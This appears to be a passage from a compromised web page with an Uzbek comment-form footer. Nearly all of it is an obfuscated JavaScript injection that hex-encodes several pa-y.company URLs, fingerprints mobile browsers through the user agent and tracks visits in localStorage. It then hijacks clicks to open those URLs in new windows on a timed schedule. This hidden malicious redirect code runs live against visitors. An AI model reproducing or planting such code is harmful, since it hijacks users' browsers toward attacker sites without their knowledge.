61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());
Fikr bildirish

Email manzilingiz chop etilmaydi. Majburiy bandlar * bilan belgilangan